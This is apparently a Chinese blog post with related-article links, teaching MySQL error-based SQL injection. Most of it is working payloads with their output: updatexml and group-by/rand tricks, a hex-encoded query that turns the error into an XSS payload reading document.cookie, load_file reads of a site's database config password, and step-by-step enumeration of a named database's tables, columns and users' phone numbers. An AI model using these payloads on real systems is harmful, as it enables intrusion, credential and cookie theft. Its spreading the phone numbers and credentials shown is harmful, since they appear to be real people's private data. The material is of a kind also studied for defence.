报错是如何转为xss的?

mysql语句在页面报错,泄露信息

=========================================================================================================================================================================

*	报错方式之“updatexml”,有字数限制,但无需配合union。

	-	mysql> select updatexml(1, concat(':', 'test'), 1);

			ERROR 1105 (HY000): XPATH syntax error: ':test'

	-	mysql> select updatexml(1, concat(0x3a, 'test'), 1);

			ERROR 1105 (HY000): XPATH syntax error: ':test'

	-	mysql> select updatexml(1, concat(0x5e, 'test'), 1);

			ERROR 1105 (HY000): XPATH syntax error: '^test'

	-	mysql>  select * from f_user where id=1 or 1=updatexml(1,concat(0x5e, 'test'),1);

			ERROR 1105 (HY000): XPATH syntax error: '^test'

	**	将上面‘test’换成你的子查询语句或函数均可。

*	group by+rand(0)+having,无字数限制,无需配合union。

	-	mysql>  select * from f_user where id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0);

			ERROR 1062 (23000): Duplicate entry '5.6.21-log~1' for key 'group_key'

*	报错方式之“rand+count+group by”,需配合union

	rand(0)无论在哪台机器运行多少次,生成的序列都是一样的

	参考mysql开发者社区曝光的bug http://bugs.mysql.com/bug.php?id=8652

	-	mysql>  select 1,2,count(*),concat('test', char(0x5e), floor(rand(0)*2))x from information_schema.tables group by x;

			ERROR 1062 (23000): Duplicate entry 'test^1' for key 'group_key'

	-	mysql>  select 1,2,count(*),concat('test', char(0x5e), left(rand(0),3))x from information_schema.tables group by x;

			ERROR 1062 (23000): Duplicate entry 'test^0.7' for key 'group_key'

	**	将上面‘test’换成你的子查询语句或函数均可。

mysql转xss语句

	mysql>  select 1,2,count(*),concat((select 0x2F3E3C696D67207372633D226675636B22206F6E6572726F723D616C65727428646F63756D656E742E636F6F6B6965293E), char(0x5e), left(rand(0),3))x from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry '/><img src="fuck" onerror=alert(document.cookie)>^0.7' for key 'group_key'

直接爆配置文件密码,前提是有file权限

	mysql>	select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),150,40) ),1);

		ERROR 1105 (HY000): XPATH syntax error: ':	'DB_NAME'   => 'fan******un','

	mysql>  select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),200,40) ),1);

		ERROR 1105 (HY000): XPATH syntax error: ':	'DB_USER'   => 's*********b', /'

	mysql>  select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),250,40) ),1);

		ERROR 1105 (HY000): XPATH syntax error: ':PWD'    => 'hahahaahhah','

爆版本

	mysql> select 1,2,3,4 union select distinct concat((select version()),floor(rand(0)*2))a, count(*),3,4 from information_schema.tables group by a;

		ERROR 1062 (23000): Duplicate entry '5.6.21-log1' for key 'group_key'

爆库名

	mysql> select info();

		ERROR 1305 (42000): FUNCTION fangjiangjun.info does not exist

	mysql> select count(*), ( concat( (select database()), char(0x5e), floor(rand(0)*2) ) )x from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'fangjiangjun^1' for key 'group_key'

爆表名

	mysql> select concat( (select distinct table_name from information_schema.tables limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'CHARACTER_SETS^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'COLLATIONS^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables limit 2,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'COLLATION_CHARACTER_SET_APPLICABILITY^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'f_admin^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'f_admin_role^1' for key 'group_key'

爆字段名

	mysql>  select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'id^1' for key 'group_key'

	mysql>  select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'login_time^1' for key 'group_key'

爆字段值

	mysql>  select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry '18602029479^1' for key 'group_key'

	mysql>  select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry '15602267509^1' for key 'group_key'

  

mysql基于“报错”的注入的更多相关文章

  1. sql注入--基于报错的注入

    这是经典的sqli-labs 中的less-5 问题首先通过几个常见的进行测试, 发现只要正确的话就会输出you are in.... 并不能绕过,因此不能出现敏感信息,因此要用一种新思路(参考白帽学 ...

  2. 2019-9-9:渗透测试,基础学习,phpmyadmin getshell方法,基于时间的盲注,基于报错的注入,笔记

    phpmyadmin getshell方法1,查看是否有导入导出设置 show global variables like '%secure-file-priv%';2,如果secure-file-p ...

  3. MySQL基于报错注入2

    目标站点: 0x1 注入点判断 http://www.xxxxxx.com/pages/services.php?id=1 #true http://www.xxxxxx.com/pages/serv ...

  4. MySQL基于报错注入1

    0x1 判断注入点: http://www.xxxx.ro/s.php?id=1' 那么尝试闭合下单引号 http://www.xxxx.ro/s.php?id=1' --+ 0x2 枚举下表的列 h ...

  5. sqli-labs:1-4,基于报错的注入

    sqli1: 脚本 # -*- coding: utf-8 -*- """ Created on Sat Mar 23 09:37:14 2019 @author: ke ...

  6. Mysql报错型注入总结

    Mysql注入虽然是老生常谈的问题,但是工作中更多的是使用sqlmap等工具进行注入测试的,原理方面还是不是很清楚,所以这段时间主要是自己搭建环境在学手工注入,简单的将自己的学习做一个总结和记录.在常 ...

  7. python 3.5.2安装mysql驱动报错

    python 3.5.2安装mysql驱动报错 python 3.5.2安装mysql驱动时出现如下异常: [root@localhost www]# pip install mysql-connec ...

  8. Loadrunner参数化连接oracle、mysql数据源报错及解决办法

    Loadrunner参数化连接oracle.mysql数据源报错及解决办法 (本人系统是Win7 64,  两位小伙伴因为是默认安装lr,安装在 最终参数化的时候,出现连接字符串无法自动加载出来: 最 ...

  9. 连接mysql数据库报错java.sql.SQLException: The server time zone value '�й���׼ʱ��' is unrecognized...解决方法

    今天连接mysql数据库报错如下: java.sql.SQLException: The server time zone value '�й���׼ʱ��' is unrecognized or r ...

随机推荐

  1. Android使用C++截屏并显示

    使用android底层自带的截屏源码进行修改后,将截取屏幕的内容再次显示在屏幕上,使屏幕呈现出暂停的效果. android自带的截屏代码在android\JB\frameworks\base\cmds ...

  2. 通过中看不中用的代码分析Ioc容器,依赖注入....

    /** * 通过生产拥有超能力的超人实例 来理解IOC容器 */ //超能力模组接口 interface SuperModuleInterface{ public function activate( ...

  3. Ubuntu apt 常用命令

     APT(the Advanced Packaging Tool)是Ubuntu 软件包管理系统的高级界面,Ubuntu 是基于Debian的,APT由几个名字以“apt-”打头的程序组成.apt-g ...

  4. 【转】在CentOS6.5安装 svn1.8 (亲测可用)

    from :  http://tecadmin.net/install-subversion-1-8-on-centos-rhel/ How to Install Subversion (SVN) 1 ...

  5. 前端之jquery

    前端之jquery 本节内容 jquery简介 选择器和筛选器 操作元素 示例 1. jquery简介 1 jquery是什么 jQuery由美国人John Resig创建,至今已吸引了来自世界各地的 ...

  6. web视频添加webvtt字幕测试

    1.使用MP4硬字幕,如下, 2.使用HTML5 添加webvtt字幕,可惜到现在还没有测试成功.

  7. iOS CALayer应用详解(2)

    参考博客:http://blog.csdn.net/hello_hwc?viewmode=list 如果你对CALayer 还没有一个清晰的理解,欢迎看一下前面的博客: http://www.cnbl ...

  8. [LeetCode] Minimum Moves to Equal Array Elements 最少移动次数使数组元素相等

    Given a non-empty integer array of size n, find the minimum number of moves required to make all arr ...

  9. [LeetCode] Sum of Left Leaves 左子叶之和

    Find the sum of all left leaves in a given binary tree. Example: 3 / \ 9 20 / \ 15 7 There are two l ...

  10. http

    HTTP是一个属于应用层的面向对象的协议,由于其简单.快速的方式,适用于分布式超媒体信息系统, 特点: 1.支持客户/服务器模式. 2.简单快速:客户向服务器请求服务时,只需传送请求方法和路径.请求方 ...